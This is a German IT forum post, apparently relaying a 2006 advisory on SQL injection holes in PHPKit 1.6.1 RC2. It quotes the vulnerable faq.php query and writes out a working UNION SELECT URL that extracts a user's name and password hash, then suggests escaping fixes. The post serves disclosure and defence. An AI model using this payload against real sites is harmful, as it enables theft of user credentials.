Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

gelöst SQL-Injection in PHPKit

Mitglied: gnarff

gnarff (Level 2) - Jetzt verbinden

13.11.2006, aktualisiert 07.01.2009, 8373 Aufrufe, 1 Kommentar

In PHPKit 1.6.1 RC2 befinden sich einige sehr kritische Sicherheitslücken, die es einem Angreifer unter Umständen ermöglichen, den MD5-Hash eines Users auszulesen.

Nachdem letzte Woche ein Exploit 2 aufgetaucht ist, das eine Lücke in der Datei misc/finduser.php ausnutzt, habe ich mir das Script einmal etwas näher angesehen.
Es befinden sich mindestens in den Datein guestbook/print.php und faq/faq.php Möglichkeiten, SQL-Code unterzuschieben.

Code faq/faq.php (Zeile 20 ff.):

if ($catid!=0) {

$getfaqinfo=$DB->query("SELECT *

FROM ".$db_tab['faq']."

WHERE faq_answer!='-'

AND faq_catid='".$catid."' <-VULN

ORDER by faq_title ASC");

while($faqinfo=$DB->fetch_array($getfaqinfo)) {



Über eine manipulierte Anfrage an das Script kann das Passwort eines beliebigen Users ausgegeben werden:

/include.php?path=faq/faq.php&catid=-1'%20UNION%20SELECT%20

1,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20

FROM%20phpkit_user%20where%20%20user_id=1%20and%20'1'='1


Ein ähnlicher Fehler befindet sich auch in der Datei guestbook/print.php.

Da die Entwickler nach dem letzten Exploit leider keinen Patch gebracht haben, gehe ich davon aus, dass auch dieses mal keiner folgen wird.
Daher muss etwas "Dirty Patching" betrieben werden.
Einfachste Methode ist per mysql_real_escape_string die Eingabe des Users zu escapen.
Eine andere Möglichkeit ist das Addon Hack_Block , welches nicht nur vor dieser Attacke auf PHPKit schützt, sondern generell vor SQL-Injections schützen soll.
Habe das ganze mal kurz angetestet und war positiv überrascht.

[advisory by phillip niedziela - site; http:
www.bb-pcsecurity.de/ vom 10.11.2006]

saludos
gnarff
Mitglied: 16568
13.11.2006 um 22:39 Uhr
Wußt ich's doch, warum ich kein PHPKit einsetze ^^

Danke!


Lonesome Walker
Bitte warten ..
Ähnliche Inhalte
PHP

SQL Injection - PHP Anwendung mit MSSQL Datenbank

Frage von PowlFruitPHP8 Kommentare

Guten Tag Liebe Community, ich habe zurzeit folgendes Problem, und da ich mich mit der Problematik noch nicht sonderlich ...

PHP

PHP - mySQL - Injections, Schadcode verhindern?

Frage von DeeJayBeePHP3 Kommentare

Hallo zusammen, ich beschäftige mich gerade ein wenig mit php und mysql. Überall sind zwar nette Tutorials, aber irgendwie ...

Erkennung und -Abwehr

CSV-Import in Excel mit Code-Injection!

Information von LochkartenstanzerErkennung und -Abwehr3 Kommentare

Nur damit niemand denkt, da kann ja nicht viel passieren. Auch bei CSV-Dateien, sollte man genau hinsehen, wo die ...

Apache Server

Linux - Debian - Apache - Code injection oder wie man das auch nennt. Brauche Hilfe

Frage von JoshuaTreeApache Server20 Kommentare

Hallo, ich habe einen Root-Server mit Debian und Apache laufen bei 1und1. Eigentlich war ich bis vor einem halben ...

Neue Wissensbeiträge
Humor (lol)
IoT-Gefahr: Smartes Aquarium leckt!
Information von Lochkartenstanzer vor 19 StundenHumor (lol)3 Kommentare

Moin, Die IoT-Manie hat weitere Opfer gefunden. Ein Casino-Leck durch ein smartes Aquarium: Allerdings haben sie kein Wasser, sondern ...

Router & Routing

Alte Fritzbox 7270 mit VPN und SIP-Telefonie hinter O2 Homebox 6641 als "Modem"

Erfahrungsbericht von the-buccaneer vor 1 TagRouter & Routing3 Kommentare

Nun war es soweit: Auch O2 hat mich mit VOIP zwangsbeglückt. Heute am Privatanschluss, in 2 Wochen ist das ...

Sicherheit

Ungepatchte Remote Code Execution-Lücke in LG NAS

Information von kgborn vor 1 TagSicherheit

Nutzt wer LG NAS-Einheiten? In den NAS-Einheiten der LG Network Storage-Einheiten gibt es eine sehr unschöne Schwachstelle, die einen ...

Windows Update

Neue Version KB4099950 NIC Einstellungen gehen verloren

Information von sabines vor 1 TagWindows Update2 Kommentare

Es ist eine neue Version des KB4099950 verfügbar, die das Problem mit den verlorenen Netzwerkeinstellungen lösen soll. Das Datum ...

Heiß diskutierte Inhalte
Sicherheit
Verbindliche Zustellung per E-Mail?
Frage von ahussainSicherheit18 Kommentare

Hallo allerseits, ein Kunde von mir nutzt intensiv Fax. Hauptgrund: zusammen mit einer Empfangsbestätigung ist eine verbindliche Zustellung gewährleistet. ...

Sonstige Systeme
Wie Normenkataloge im Unternehmen bereit stellen?
Frage von MuzzepuckelSonstige Systeme14 Kommentare

Hallo Kollegen, ich lese schon lange hier mit, nun mein ersrer Beitrag, bzw. Frage. :-) Wir benötigen für unsere ...

Linux Netzwerk
Raspberry Pi 3: WLAN Power save deaktivieren
Frage von nordie92Linux Netzwerk13 Kommentare

Moin moin, mein Raspberry Pi 3 Model B benötigt eine dauerhaft aktive WLAN-Verbindung. Leider bricht die WLAN-Verbindung nach einigen ...

SAN, NAS, DAS
Entscheidung SAN Dell oder HP
Frage von VincorSAN, NAS, DAS13 Kommentare

Hallo, wir wollen uns für unsere Hyper V Umgebung eine neue SAN Anschaffen. Es laufen 30 VM's darunter, DC; ...